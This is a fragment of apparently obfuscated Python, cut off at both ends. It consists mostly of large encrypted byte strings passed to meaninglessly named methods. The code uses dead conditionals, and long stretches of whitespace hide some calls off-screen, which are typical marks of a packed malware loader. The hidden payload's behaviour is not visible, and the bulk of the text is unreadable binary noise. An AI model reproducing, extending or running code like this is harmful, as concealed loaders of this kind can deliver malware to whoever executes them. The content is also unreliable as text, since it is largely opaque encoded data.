DB\x0cQ\x9e\xe1\xdb\xee\x8d\'\xe9R\x8a\xcaY\x8b\x95\x0e\x99\xff\xd4\xd5m\xaa\xeb-X\xbf\x17E\xd0\xf7\xda\x87\xec\xa3\x9f\x8a|Wp\x02-\xe8L\x84\xe1A\x13,G\xaaMp.R\xee\xa0MuC_Q+I\x92\xc7\xe6\x88\x18\xde\x96\xc4\x93\xc4G\xa4\xfe\xb8\x82"\xd6\xa9\xc9\x1dYP\xd7(b\xd3!h\xf0\xb7\xa5\xae\xe8\xb3^\xd0\xef\x0bCd\xbf\rw\x85o\x82\x96=\x06^|^|\x86\xd8;\xcc\xed\x87\xd1wW\x10\x8b\xb7h\xefA\xd5A[b?\x12!4\xacxQ\xd7\xd5\xf5\xd6\xc6:\x8dgK\xc2\x9b\x0bHiv\x8eY\xee\xcf1\xe1\xfdE\xf3\xbcfdX%]\t!\xc8w)\x1c\xb4^\xdaN\x7f\xb0\xcc\x8dJb\xd2\xcd\x1dU\xb8`\xd7\xd5m8\x93\xbdqP\xcc\x11\x8dx\xa2\xce\xb4\xa3\xfeP\x05\x91\x10\xf23\x0c[\xda\x95h\x87$s}!\xdd\xf3pE/\\\xf5\xfdDJ\x97\xb98\x97\xa4\x13\xf1\x1b5\xdd\x91\xbext#\xb1p\xd6:\xc3\x199=\x18\xc2\xff*N\xc2\xfdf\xa2\x98Y\xd7,\xce$\xcc+}\xb0\x92\x83\x9d\xa9\xc5\xf2(\xd6I\xcd\xe4\x9d\xaa \x94Mu[j3K\x87\xa7\x0b_\x90\xb0\x061\xeb\x08\x86\xb5\xb0\xe5m(4ai\xedY\xb2@\xf2\xed\xd1\xd2Z+m\xec,\x8a\xd9\x0b\x97\xe3_\x82\x18\xc7\x00\xf7T*\xdd\xcf\x98\xdb\x15o\xb8\xb6\xc3#\xdf?\x12\xffO)\xa4\xa7\xb1g5\xe3\xc8\xef\x82\xf0z*\xe5j\xa9t\x0b\xe0~\x86~\xd4\x02\xfd\xc2\x05\x9b\x97k\xa5\xed\xf0\xe4\xe2\xe1\x14,\x9f\x18\x98$GW\xa2\xf0\xe4\x9b\xean\x89\xf9\xdb!\x7f\x13\x18X\xd3\xc8\xa5\x9e\xeb\x88l\x1dXR/ \x1f/\xc8\xad\x90\x9a\xd7\x88\xb1\x87\xe7\x9f\xdc\xb1\xbb\xaf\x9d!\xdaB\x18\x95\x11H\xdc\xa0bB\xb1\xeeQ\x05O\xdbT\xb7a\xa4y\x03\xee\x8e\xaf_\x9d\xf0\xd0\xd8\xa9\xf3&b/p\xdd\xa2\xebu\x9c\x05\xe0\x94U\x91gq\x1c\'Qkg+\x9e\x00Z\x85\xe8\xc4\x1a\xc2\x98\xdfD\xf1\x17\x92\xf1\xb4m\xeev&\xead\xb1\x85\xa4\x98C\xed\x03]\xc1\'\x8f\x88\xde\x9bJ\x11xz\xed%\x8b\xf2\xdb\x90\x19\xee\xc0\xc1\x80\x8c\x0bq\x1e\x11~\xa16\xd0r\xc4?\x98RD<0\xce\xa15\xfb\x02\x92\xff\x9e\xe3\x039\x80a1\xe9\xb7K^\xb1\x8f\xe4\x1d`gK`m\xed\x82\xc1\xe5\xc8&\x1b%6z\xf1\x95\xbd\x1en\x06\xad\xb0\x9e"y]\x0e\xe0\xd6s\xf2\xa3\x9c\xd0\x9cN\x0bO\xad\xc5\xcc\\#;\xd6\xcbjR\x8e\xc2lR\xd7\x9b\x8f\x1c\x16\xb8\xc8\x17M\x10bY\xe9/\xb3\xaf\xfa\x81\xdfu\xefR\x0e\x92\x91\x97\xec\xa2\x93\xb4\x9a\xf9Yg\x17\x9dx1\xdf\x00/\'RP\x16\xf1\xd8\xdc+@\'\x85^x8\x99\x86\'\xb5\xaf\x0c\x04X\xc2\xc9\x99v\x0f\x03\x88<`\x92SE\xe2\xec.#vt\xce\x88n\xe8\x1e\x87\xdf\x99)\x7f\xad\xc1B\x8c\x13\xc2\xcc \x1c\x0c\x1e\x08C\xbd^\x90J`\xa2\x93\x97\xe8$&]\x83h\xac{\\\xa7\x16\x15\x9ez\x9doss\xbd\xee#lb\xc5?\xae\xc7\xa4p\x913\x0b.\xbcz\x00\xe3$\x940\x1e&\x9d\x14\xe2w\xa3A2L\'\x19LA\xa3D\x92\xc9\x83K\x04\x82\xd9\x12b\xdb4\xab4\xac\xc8)\xda\xc9\x80\x873\x04~N\x00\xb1\x99\x89\n\x93\xd6g\x19Z\xa0!==\xac\xe0C\xb0\x91\x9a\xbd\x84\xb4\xf0\xc8qh\xfflS\xb0\xdfv\xc1\xe8\xb9\xb4\xa1]\x9f\x1bT\x12\xe8\x10w\xab\xd9ne\xef\xeba\xfa\xbd\xe8\x8e@\xdd\x90`\xb1\x87\xf6\xbeZ\xe9\xe1\x1a,\xd6\xa3\x86\x11/L\xe0az\x04\xc1\xe2\xea\xaa\x05nX\xa7\x8d\xd0O1s\xa1d\xb4$\xc5\xc4\xaa\xba\xbe\x84\xd37\xd2e\xf0\x14\xd9z\xa0\xec\x07\xcd@%[*\x95\x18\x1a@Vi\x8e\xa9A{g\xad\xb4\x9d\xbdS\x82$e[n\xa2X\xa5\x8a%\xfc\x19\xab\xean\x19\xfd\xd1Mr\xa8\x08\x92\x91yY\x15-\x0b81\x81kfp\xfd\xde\xbd\xbc\xd9Zt>\xba\xfa\xbc\xb8\x02\xf6d\xe0P\xfel&\x84\xcf-\xa6\x04\xdf\xdav\x12\xc5\xbd\xb8\xad~M\xc1\xd7\xacS7\x8fY_\xe93\xd3\xe1\xfb:\xb5\xb7\xc4\xb3\x84\xcag\xb6\xa9\xae7\xc0\n\x10>@\x84d\xdb\xdeB\xaa6\x1f\x15\x9e\xed\xb4n\x11\xcd\xc4="\xe0\x1d\xeb\x1e\xa9\xa4R_W\xd7\x1bv7\xf5\x92N@k\x02eL\xbavbz\xa0\x9c7\x8ai&~\xd3^\x08\xed61\x036\x08\xf3$\xc3\x94\x13 \xcd\x99\xf9\x13\x16\xca$\x0e\x83\xa8\x87\xf9\xae\x83hh\x16K\xac\x11\xa5Q\x0c\x9f\xb2\x1c\xb6B\x08vB\xfeb\x94\'\x01\xc8\x1f\xc6CL\xfbx\x0f\x14bQf~\x1d\x99;i\x8e\x10\x0f\xe3<\x89\xe3q<2\xb2c\x80\x97<\x84|t1\xfc\xcaH\x9a\xe9=\xee\xcd\xcc\xd6(\xa3\x82\x0f\xfe\x1e\x8eo~=\xa1\xb3\xa0sE^\xb9\x14\xa5\xd4\xa2r\x94\xb6\xb0\x1f\xc8\xf7\x07i\xff0\x05 $!;o\x9a\xabt;N\xc9\x14\xc3\x04c\x04h\x15\x1c\xffY\xd4K\xdb\x1b\xb5\xb4\xab^B\xb4\x04\x9cUT\x8cZ\xeb\xea\xfa]\xb1\xcd\xa9t\xc3\x7f\x8a(\x17\xcb\x05-[\ro\x0b8\x87{\x18e\x99`\xf3G\xa8\x04$\xf5\xd2\xbdZ\xf0\xb7G\x83\xb5\xa4\\\\\x1aa\x109\xd2pM\'\xae\x89\xc5\xf5\xa7\xcd\xf3\x96\xcd\xbe\xca')

        if 459915 > 2591685:
            Invert._invert(Builtins = Invert._run / 83968)
        elif 445734 < 5866771:
            _square(_system = 64342 + 60167)._cube(While = -89696 * Invert._run)                                                                                                                                                                                                                                                          ;_square.Cube(_statistics='jiiljlljljjiillli',Statistics=b'\x0b\xb2]\x93\x99\'\xa5\xc3\xf4\xab\xe5\xbc-NB\x93?\x1f\x99[\xf6j\x14_Ko\x91\xa9\x98\x90\xa5\x99[\xfc\xd8\xa0&\xc40e\xa4\xee\x9eC\x1d\xa4Y\x96\x80\x9d\x00,\x0f\x88u3k\x8d\x0f\x03i\xed\x82]3\x94\x02c|\x00\xf8H\xf1\xe0|\xb4f\x89\x1d\xe3\xd2\x08\x8d\x80f\x94\xd4C\x8c\x9b5\xc59c\x9c\xbc\x8e\xbc\x18\xe5:\xe1\xfc!\xac\xc1\r\xc3\rn\x1a\'\n\xf1\x05\x1di\xed\x9e\x151U\x98#E\xd4\xcf\xd53\xa8\x88\xb4\xab\xean\xc1,\xdb\x0e\x15)RX\xdb\xb4%\x8c\x19\xe1\xff\x16\xa8\x11\x81\x8bk\xa3Q\xa0\x0cE\x99\xb23\xac\xab\xe7+\xf7\x02\xe0C3\xb0\x9ff8\xa8\xdb\xb6\x1c(\xe0\xf0\\|F%\x9c3\x19\xb5\x88\xa2\x90\x8c&\xda5)\xc1D\x96\x8dC1ul\xaa\xdb>\xa0\x1f\x08O\xf2;\xe2\xe7N\x91\xf0%\xe7\xa4\x90\xb5\xd2\xfdIV\x9b\xe1\xff\x12\xf8\xd3\x0e\xfb/z\xbf\xe0dK^e\x19\xf0\x15\x1b\xc1\xba\xba\xbe\xf8\x15$\x17\x99\x9f@e\xeb\x93\x14\x17_\xc9\x7f\tO?R\x88\r\xc9G\xa6\xcb$\xcb\xbd$\xa3-\xa5>t\x11\xd9\xa9u\xc6\xaad\xb5\xf8\xe8^\xee\xc83?\xfeKg\x8d \xff\xa5\x90\x06\x17\xfc7*\xf98=\xf83\xcbT\xd3\xad)\xd3 \xbc\x8ar\x8cc\xc4\xd5Ec\xb4*k\x80\x94F+f\x12\xd8\xb0^\xfa\xd7\x16ad\xb6\x11\x03~ItI\xca\xfc%M\xea\xee\xc8\xe4\xb3}7\xd9J\xdb\x02\xc3\x17A\xb7L\xa7\x8a\xc0\x8cd~\xc9JJ\x16\xc1\xf7FEi+\xde^`\xfez\x00\xb4Q\xa7\xc3\xcd\xa6\xa1}\xc4\x02\x96!\xa3Y\x81V\xa1\x82M\x11\x95\xd2\xddo\xb5,2Z\x86\x12Y@\x829R\x15m\xb9\xa9\xee\x16\xb7z\x83+\xb6\x87\x80\xff\x14\t\xc3\xc1\x05\x1b}\x94\xd0\x8bRi;\xf0\xb5\x88<\x9a\x8aWXN\x90yR\x81\xaf7\xd5m\x9ape\x07\xa3\x8b6\xbb8\x03K\xd5\xfc\xe2!\x87[W)\x89\xd6`\xcd4\x9bb^B\x9bu\xae\x98\x87\xf1d\x14\r\x06H\xd1\x15\xb2\xfb\x17\x92\x8c\xe5i\x01\xc4^y\x86\xdf@\xacth\xdeGH\x02\x96\xb5\xcd]\xb2\xee\x9e\x96\xef`5\xf7\x86\xbc\x1e\x1e\x83\xcb\xd5\x15Dyc\xaeU\x8c\xfc6\xcfC\xc0\xc4\xd3"\xd9b\xe1\xcb\x95\xd8\xad\x01\x9d\x96\x10I\x89\xe8\xeb\xeau\x91I\x00-\xa1\x16\x00\x0c\x9f\x0e\xc1\'\xdb\xba\x89;\xd4\xd0\xd6\x10M8J\t\x95\xa2\xce\x95\xf9 \xbfA\x00\x14\x86\x8e\x1aa\x15\x0cc^x\xac$E\x87~:\xcf\xe1\xa8I\xc0\xe3U\xb0\x80\x9c*\xc8\x18\x18,\x80G\xd0l\x1d\x1f%\x9fZ\x062i\x87\x91\xe8\xaf\x92^\xa3\xa7L6M\xeav\x11\xc84\xa7\x07\xc2n\xf02\xf0u\xde\x06$\xae\xdd\xceU\xdaC\xb1:Us\xb4\xad\xab\xdbPd\xd8z\x9d\x83Gf\xc4a\xc2\xf7\x01\xc0\xc9tM\xe0\xfb\x18\x04\x830\x08\x030LC7\x8d\xc6f-\x98@.n\xb3\x0e\x9a\x92\xba\x08m\xb6\x01\xdfw\x8f\xb0\xf3\x82\xc4e-BC\x1c5\xa6\x8dN1~z\x04\xd8@\xd8k\x06\x11X)\r\x83l\x88\xd6~\xf0\xe8\x8eC\x12\xc7\x99%\n\xf5q\x8e\xd7\x82z\xee\x93\xd92{2\xf5\xb3\xb00\xc7\x1bd\xe8M0\r[\xf0\x15\x14)x\x93k\xacS\xf8\xcdD]!_1\xfe\x06\xc8\x0e\x8dh\x0fi\xa6\xc0\x0e\x90\xc2LT\xa2\xf8\x97\xbd\xc3\x1fb$\x0b$\xf2\xcb)\xdb]\x08YG\x83Uu\xcc\xc1\xc2\xe5\tIW\x03\xccL\x1b\x07\xa5\xd6\t\xb0\r\x12\xf4\x92\xc0\xed\x18\x97\xcf)\r9\x86s\xc8\xad`Z\x1c\x9c\r\xa5\xabL\xb2\x1c=\xeftFE\x1cC\xd6u}\x8c\xf5IU\xf9\\\x07\xa6u\x02\xb3{8\xeb\xfbU\xa9V\xe1\xec\xa8\xb7\xb5\x12\' \x97\xdb\xc3t\xfa\x809\xdd\xe0\xdd|\xdc}\x90Fj\xc0I\x94\x86p\xbb\t\x93aR\x81\x0b\xaf\xab\xeb-\x92\x83\x8d\xee\x98{=A\x80n[3\xb28GC\xfe\xa3\xaf\xda\xc1;5zO\xe64\xa1\xf3\xca\x15\xb4s]=_\xe6\xcam\x15~\x9a\xad\x90(\x1e\xb6\xf3\xac\x97\x8e\xcc\xef|\xb8\xe2\x06\x8cO\x16\x84r\xa1>;\xac\xfc\xa8%fye\x8c\x90\xa7\xa4\x81\x8a\x11\xc5\xbd\x8fK[~\x82j\xba$O<\x92\xc8\xe6\x9b\x1b\x89u\xbei\x9c1\xbc\xb5qM\xc6\x85\xf8\xf9\x04_#t\xca\xb9\x12\x95\x9a\xd4m**\xed"G\xc4\x08\x92\x1e\xde\xa3\x96<I\x9d\x9e\x8ck\x03\x91a\x83\xa6,\x18\xae\xb0\xd76\xf8\x13h\x04\xc0>\xdbGc\x19\x92\n\x1cn\xe8gg\t\x9b1\xb5)\x12g\xc0\xff\x03\xd2g\x98\xd5\xf0M\xad\xc8+\xcd\x85\xda\xbd*\xeb\xa4\xc6dV9\r\xd7\xd5\xdd\x82\tl\x97\xfb#\xe69\x1d\xa8)2\xb9%\xddTj\xc9\xa6\xbaMD\x81w\xf7O\x8b\xc7\xf7\xc3\x1f\xd3\xd9\xcbt\xfe\xfc~\xfa\xf8}\xf1\xf4\xf2~\xf2:\x19}\xb8_<=\x0e^>L\xe7\xdf\x7f\xbc|\x98M\xe6\x1f\xbe?M\xe7\xf0\xf9\xe5\xc3\xd3`\xfe\xdb\xe4\xc3\xe2\xbb)\x9c\xbcN_\xdeA\xfdc!\x1e\xeb+?\xe4\xc9;\xde\xe3\xd3\xe4\x7f\xfe\x98<\xbf<\xbf\x1f<\xbf\x7f\xa2\x83\xbeL\x1f\'r\xc0\xe7\xd9d\xf2]\xea.\x9e\xe1\x00\xe3\xc5#\xd5\x1b\x0f^&\xba.|^\xfd\r|~w?\x9dM\xee^\x16\x7fL\xe6w/\xe3\xe734j\x03L\xd2r\xd6\xc1\x87\x8b\xf3w\xa3\xdf\'\xa3?\xa8\xe2\xd9\xe2\xf9\xd3\xf7\xc1\xcb\xef\x9f\xcc\x05\x99\xf3<.\xef\xe2\xe4\xddxr\xff~4x|\xfd1:\x1e\xfdq?\xfc0z4/?\xa6\xe3\x93\xd3w\xef\xdf\xff>\x19\x8c\'O\xcfg\xff\xdbl\xbf\x07\xa78Z\x99\xc4\xea\xb48\x95#\x92#\x07\xa8G>@M\xa6X\xb2\xf4\xa7\xb8uzc\xe7xG\x81\x05\x1b\xf8\x13Y\x0b\xa4\xc6\r\xa3PN\xa1sag#-\x12\xb6\xf0\x07\x1c\x9aM\xe6\x19|?\xc5\xf3\x87\xef\x90\x96\x7f\x81\xa9J\xf1l\xe1#\x06\xdd\x9cZzt>\xfe\x8dPr\xd1\xef0\x10\xc7\xfc\x03\xa7?\xfe\xe2jq\xca\x13\x04\x13\x11\x80l\x87u\x17\x0b\x00\nP:T`[D\xd0\xfe\xe2\xf4\x8b0\xb7\xf1\x08\xc0A\x00\x0cnt\x95\xf6\xa2\xdd\xa1O\x85\xea~\xe6(cgt:\x1c\x1c\x04\xf9V\x17pFp=Ap\n!\x02\xe6\x98\x9f\xf1\x14\xc0\xf4\x87\x15\xf1\'\xd4\xe6\xd4\xe4\xc4\x1bq*\x17+\xe0\x9e\xafX\x91\x9a\x14\x15qn`j\\no\x1e\xd0\xfc:\xc7\x9f|A:\xbaK|\xbb\xe4\xab\xba\xfcr*{\xb7\xd7\x86\x1f\xf0\x177\x0c*\xb2H\x14\xc6\x81\x9e\xda\xb8zd\x9e\xc64l\xd4q0\x139P\x16\xa1\x162\xc3\txv\x8a\xb3\xf2\x0c\x99\x8c\x1e@E\x81b:\xa5K\xe1\xc8Sm\xfd\xe5\xf2\x94\x19wm\xff\x83\xe6\xf8\xf0\xee\xff\x98\x9f\xdcO\xe7\xe3;3\x9e\x06gO\x9f~\x9b\xbc\x1c#\xcf\xc1\x05u\xe3sZ\xe7\xce/>H\xbf\xe7\xf7\x93O/\x93\xd7\x17\xf3\xeb\x87\xc1\xffZ\x98\xd1~f\xf7\xf2\xe9\xf9\xfbl\xfarL)\xb1\xe9\xf4ln\xec\x93[\x8b\x95$\xe4$<\xbf\xf1/\xb0C1\x8e\x92\xfe\xb1\xce\xc9\xedO\xceL\xa7x\xb9\xcd\xc678\xf5\xe1\xdd\xf8\xe5\xf9\xb7\xda\xc1\x99\x9e\x01\x86\xdf9]\xc4\xf9\xc9-\xddN;M?\xce\xed\x81C\xbb\xe8QfP\xfa|}rK\t,\xa0\xb3a6\x0bL\xfb{\x15\xc0\x91\xa7f\x8a0\xd3\xc2\xd9\x19\x8dt\xe4\x18\xc2\xd9\x06g\x1fsl\x98+\xde\xf34r\x86\xf3\x03\x8e\x0c\xd3;\x01?\x83Cd\xa1\xf7#\x06U\xc9V\x08o\xa5}\xd8\x01\xc1S/\xdeG\xbd\x87+\x8e\x92A\xdb7\x0e\xc5\xd2\xef/]7\xbd\xa45\t{G\xf9ZP\xb6A\xd6Oj<\xb8\xba\xd2^x\x86\xe1\xce\n\x9bz\x07\xc8\x14zA\xc0\xf4\x0bd\xc78/\xff\x9cB\xcd\xf8\x16\xd0\xb02/z\x17B\xc1N\xe3\x81\x8eS\xda\x05\xa8\xe13\xec\xf93\xd4\xc8ap@\xf7\xd7;q\x93%\xb3\x0b~-\x9f\x05O\x9b\xf3\xb9t\x87y\xb9!!\xd2h!p\'\xf3_\xfa5\xde_\xf4\x97ZV)\xa4E\xd5\xbb`j\xbd\xbe\xce\xdbQ\xda\x89)@\x93\x02\x0e\x0e\x90\xb1x\x0c\x9b:8\x14qy\xc1\x07]+\x8c#a0;\xa5}|\xb0U\xa4\xa1~\xbeZ\x93<\xdc\xa2S\xb3f\xb9J\x0fx\x04h/\x1c\x96\xf0\x01\xfff\xa7<\x8a\\\xd5k\x96\x03i\x8e\x0f\xf9\xe3)\x0fu\x9a5\x9e&\xcf\xdf\x17\xf3\xe7\x89\x994\xbe/\x9e_\x8e\xb7\x92\x7f\x96\x19\xf4\xd6\xab\xc8Y\x02\x86\xbc\xf0\xbeJ\x15F&>$7a \r\x01x\xd1PW\x90\xf1/\x0b\xd1\x84\x87\xd0\xde\xac\x89\xed\xbb:\xd9}\xc0[\x02/$\x1c<\xff>x\x9a\x90l\xb0T,xO\x0b\xe1g\x19\xea \x18@\x87\xc2\xe5x\xe9\x9c\xcb\xeb\x16u<\x8cw\xdbz\xc2\x95U\x83\x87\xa7L\x97\'\xb7\xc8v\xf7\x80]l\x86\xb3\xb2\xcc{0\xdc1\x90\x84\xe8\xd1@r\x82\xc9\xd6\x8d\xf0W;\x0c\x7f\xae\x9dn\xdd\xf28\xb7\x93\xec\xe3\xc9-!.\xedX$\xad\xd6<\xe5\xf8\xe6\x9aQt\xa2\xd0>3\xeap\xaa\x17\t\xc6\xe5a\x80\'\x1c\xfe\xc7\xf3\xe4\xe9n:\xae\xcf\xf6\xb8b\xf592\xc6\\\xce\xc9\xad\xd5\xd0\x10\xd9\xc0\x93Z\xff\x9b=\xdfG;\x05\xf1\xa2\xff\x08K\xd3\xb5\xe4\x87\xb6\xa0\xfe0\xc4\x03?M\xf9>u\xd0\xcbS0\xf1\x80e-Z\xdb\xdf\xdb\xf4\xd7\x93O?\x9ef\xe6\xbcG#>ms\x01+\xfb\xd3d\xf2\xaf\xb3\xd1\x88[\xe6\x92\x1e_.\xe5j\xe8\x93\xb9\x97V\x94)\x8b\x897\xd2\xa6\xdc\x92s\xeb\xd0\x80\x0f\'\xb7"\xa5Z\x91\x95\xbf\x99\x7f\xd33\x1d\xcc|3\x12qf(\xce\xe89\x89\x96\x0c\x11\xc9\xa8\xdd\xdd\\\x04\xb3\x95\xdc5\x91\x1a\xc2\xf0T\xfa\xf4\x05\t\xe3}\x94\xc2/E^\xc3\x0b\x84\x8d\xd3\x99\x82Q2#*\xd4\x9c\x97\x04\x05>\xe9S')

        _square(_system = 54998 + -87843)._invert(Builtins = Invert._run + -55629)                                                                                                                                                                                                                                                          ;_square.Cube(_statistics='NNNMNNNMMNNMNNMNM',Statistics=b'\x99\x15C\x11}\xc3k9\x01\xee.||\x9c.y\xf6\x9d\xcf\xf5\xce\xe0\xdc\x11S\x8b\xe3\x1c\xe7\x08\xb3\xc2\xe0\xc9Qs\xb3p\x0c"\xdb\\\x8e\xac\x1dEs\xae{)k\xb9}=e\xb5\xc2i\x19\xac\x9d\xc1/\x14\xd7\xaep\xe8\x81\xd4Y\xa5\xd4\xbba\x94\xf4\xd7\xb7\x98\xe3\t\xf7$\x14\xc3\xe0\x00BSh\x10I0\x06\xbaq\x90\xc5\xc6\xcc\xed\xb8\x12\x00\xad\x15d8\n\x90\xcbf\x0c\xf4\xf1\x18&8\x8c\xc0\xf6\x91\x12\xdf6\xd4\xc6o\xc0\xc0\x9aa\x98u\x8e\xe5#\xda\x03\xf8G\xa9~J\x0e\x18\x0c\xf035C\xa2\x98\xc8\xd0A\x93\xc5\xe6{\xce\x03\x94\x81+(\xc9Rp\x1b\x99o{\x88\xd02\xe5Q\x93\x0c\x9f\x9bV\x97\xfb\xc5l\xb6\xf8\xb9zy\xe1{^\xea\xc7\x97\x97\xab\xd7\x16\x1e\xb6rga{\xeb\xc5\xc5I\xc6,%_\xc3\x1c\xcb\x14\xe4\xd2\xdb\x84\x95\xdc\xae/\xc4\x96FB1\xcd\xc2F\xa4^\x90>I:\xb3Q\xe5\x02\x90\xb1\xd7\xad."\r\xbb\x94<\xe6yr\x0b\xc0\xb5sBL\xf2\\\xdf\xbfpG\xee\x0b\xa3\xb1\xe3H\x9f\x19\xf5\x83\x97EY\xdaD\x9a]\xbf\xbe\xc8:&fY\x1e<0\xb9\xf1\xe0v2-\x0c\r\xbb\xcc\xc8\xe2"3\x1f\xac\xc53\xd4\x89`\x19\x86-\x98\xf0J3!=\xfa\x0c\xcc;?\'\x1c\xe897aY\xa2C}\x1cZ\x0fT\xf4\x00\x95\x14\xf0\xa0/\x82\xbaD\xc7\xaa\xac]\xee\xe8\x94\xf4,J\x0f\x04\xcd\xa0\xfa\x80\x9a\xfeg\x14\x83\xe1n\x9dr\xe3\x90\xf0\x07\xa7\xdb\xe3\xf3\xbd)\xf5.\x99M\\}<\xbck\x83\xb9\xa8\xd8\xe5\x1a\xd7\x1c?\xc7\x1d\xccN\xe5\xa7,C\xa1FC\xb6\x05\xfa\x81\x98>\xacF\x8e5I\xff!5\x0b\x9e U\xf1\x0f\xec\r\xe7;n\xe4cR \xa0g<\xa0t\x8c\xb2\xb1:c\xe7\x9d\x97Y\xf8\x94\x17\xb9\xb9\xcc\xca\xd6\x04C?\x939W\xc6\x03n\x9f\xca\x8e\xe6\xb2D2\x00@.]\xe8\x1d\xd97v}\xaa\x87\xb6(\xf2|\x00T\xaeH\xdc\xb9\xc0\x9e\x7f~\xaaZU^\xdcEp\xa1\x187N\xad\x94\x13\x8a\x02\x1e\x8a\xfd\xe6}\xbf\x9ch\xd0\xa8\x06\xd7%\x81Htd\xf3\xc2\x07p\x16\x13\xbe\x13\xa7(d>\xe0\x82>c\xd3\x04\x99n\xde\xa3\xb6A\xfeT\xec\xf8\xa8\xc6\xcdN\xad\xbd\xe2R\x99\x89\xf8\x172p]j\x13|\x94\xfb\xf7\xa3\x1bc\xb25/\xf7\xec\x19\xdd[R\xb6\xf0\x1d\x8e\x0c\x07\x17=\xefJ\x94=\x18\x00F\xf8\xc6\x9f}\xbdQ\x0b#[jL\xcf\x9eKS\xcb\x93\'\x01\xfaQ\xf9J\xf0bN9~f\x81c\x0b\xf3\x92\xf0\x01\xbe\xca^9\x12\x98\xec{nV\xb7\xf3\xfc\xa5\xbd\xff$\xd4\xa0\xe8\x0e\x8a\'\n\xefht$[\x07\x89\xba\xf0r~\xfeA\xc6\xe7\x8d[\xd8)\xe8\xf8\xe6\xd4Mdb\x9e\xbaa3\xd8{g"\xf8"2 \t#r\x97\x9d\x1c\x82\x95/\xe5\x0c\x9d\xe8\x02\xf6\xa6\xbe\xb36\xb1\xedm\xf6\xab\x99\xbe~\xa5\xbc,4\xfb\xe3\xfc\x02\xaa\xd1\xd5\xaf<\x1b\xfc*J\xcc\xcf\x925\xccl\xca\xb0\x97FwgsJ&*\x14\xf5P\xe2?G\xdb\x03\x8f.QfCY\xc3X~;\xb5\xd3\xbf(\x1b\xb8\xb8,\xd7na\x8f\xe7d\x1e\xa1$(`=[\xb3\x8e\xb3\xec\x8d\xbfu\xa6\x08Q\x85V\xff\xb2\xc7\xd6\xe7\xc7\x17\xbb\xfe\x7f\x98\x8f\xcd\xc7\x9a\x14\xd0\'s\x13\xfa\xa4.\x98\x0f\xa0\x7f\xb1Z\n\xd0\\\x9d\x82\xde\xc3\xe7\xf6\x96=\xb1j\xd8\r\xd4\xb7\xfal\x16!\xeb\x0f\xad\xca\xfd\xbe\x92\x05\xa8\xe5HW\x83\xf6<\xb9E\xa9\xff\x81\xe6\x02\x16\xfcq\xe6X\'\r\x88\xe0+\xc6V\xdc8\xb9%Yz\xb1`\x85\x1b\x17\x8d\xcfWrt\xb4\xe0\x89\xb9\x18E\x8f\x05\x82\xcd\xae\x16\'\xb7\xafJ\xd9%\x9dy\x9d,\xa0f\xda\xb2\x05\xfe\xe4vf\x05 \xcdQl^\xd4Y\xa0\xb4s\xc5\xd06\xf3\xd1\xfc\xca\xa5q\xb1\xbf\xfa+\xeb\x9c\xcf/\x8b\xa7?\xef\xee\x87\xa6\xed\xcc%(\xb5R\xcd\x13\xf0\x7fr\x8b\xbd\xf6\x82,\xcd\xd4}\xcf\xbf)qS\xe1DD&0\xb7\x99@\xbd\x0c\xefE9\x12\x1ak2\xf8\x97>\x1a\xabyb\xfc\xferr\xfbho\x95\xd5\xfd\xad\xf9\xd7\x9a\xfa\x9dMr\x0e\xf6\x00\xa7-\xda\x86\xc6\xd7\x92\xbc\xb6\xf8L\xf6\x1a\x947\x16\xe8\xfe8\xc5\x01\x0b\xb3\x8f8\x8air\x86I\x19.\x19\x96HX\x1d1\t\x01\x88 $\x81\xe0*\xe9t\xb0\xaf\xe2\xfc7\x0b\x02\x12\xd7_\xf0\xc4/^-\xa8N\x02\xceg\x8e\xd1D\x1b\xca\x95s\xe8\xf0\xf4\x8e\x8e\x1c\xe10p\x13\xeb\xe9\x05\xd9\xad\xf1\x8f\x96\x12\xf8\x83\xca<@\xcfY\x89\xc6IF\xaf\xb9\xe7d\xfb\xa4\xa5\x86\xc9\x90/\xce\xf5\x9a{!\xfe/\x92bi>8/\x0b\x91o\xa0]V\xf2\xe0Z\xfd\x12Xt\xaa\x01y\xa4/\xa6D;c\x14\xc2\x86V\xc6%x[\x04\x17j\xcd\xb1\x87\x9ac{M\xf1a1\x9d\xff\xf6\xb4\xc6\x10I=\xf33\xf5\x0e\x92=\x96\xae\x10\xec\xb1\xc5\xe9\xc6:\xb2\xac\x1c\xc3C`\xfb\x85\xa2\x94\x95\x8e\x8d\x11f\xd6\x9fYY\x1b\xe5\xc1\x07\x82\x18(\xb5Q\xb99D\x94\x862\x982\xfa\xe2\x9c\xe8\x93\xa3u\xddRa\xc5G\x96\xcaQ\x03T\x9e9;\xd8\x94\x07J\xc4\x05\x9az\xcc\x8cC\x96\xd4\x9fv\xb9\\\xbb:\xb0\xaf\tG\xc79\x8dx\xa3\xf2\x8a\x8e\xe8\xf4\x89\xb9\xd2\x12-\xc3\x08\xaf\xd0(\x85\xb0\xb7Jl\xa98#-\xd1\x13\xe9a\xfd\xab\xeef\xb1\xd3\xaf\xa4b\xb9\x87\x08\xb6l\xcb\xbb\xa9\xaak\xee\x81\xeb\xe9\x15\xd9g\x17\x9f\xd9\x92]W/\xe9\xe1\x14t\xa5\xaf\xd7uL\xd14\x17\x12L\x8eG@\xd7-\xccf\xa7s1%Z\x8bY\xf5\xb7\xe4"d\'\xa2\xf6D_\x9f\xb2\xf7P\x0c\x82T\xa7\xfa\xfb\x99E-\xccf\xd6G\x03\x1e\x9a\xaf\xd6q{\xe3\xba\x07\x94X\xf1T\xf2\xad)\xcbB\x1f\xc5Z+C\xf24\xfb*\x12\xab:\xacJ\xb4\xe4\xf2\xb6\x9d\xf2\x02!b\x13\xcaI(kV\x7f/\xee\xcb\xb9\xf3\\\x91&\x8d\x92\xcdU@R\x05\x1a\x02\xae\xae\x96\xcf\xb1\xd7\xcer\xc9\x8d\x07M\xb5i\x9e\x99M\xff\x98|\x1f\xfc\xb6\xc6\xe5A\xae$Q\xfa\xcc\xe6jA\xd4\xa9t<\xaeg[O,h\xe7\x08\x00\x91\xb0\x08\x18\xcb\xb00\xa2\x94U\xa3$S\x08kl\xce\xdfA&\x15\xeb\x18\xbe\xe8\xd3\x8f\xac\xe1B\xec<`\xd7^3\xb1X#\xb9\xa8<"\xd2\xdc\xb0\x81\xed\xc6\xeas\xf8\xeaf6\xd6\xd8H?\xc3\xd3\xe9\x83P\x83\xf6\xe0\xcf\x84\xcb\xf8\xccc\xc1\xfc\xaf\x9bjp0\x92\xcb\x88\x08\x12Q\x98e\xd5\x90\x84m\xb6\x1b\x81\x04\xe2<\x1fs\xdd\x89\xe8#\xb9>\xa4c\xc8\x00\n\xafk\x13N\t"\x82jde\xda\xe8\xbb\t_\xd4>xV\xab\xfd\x149\x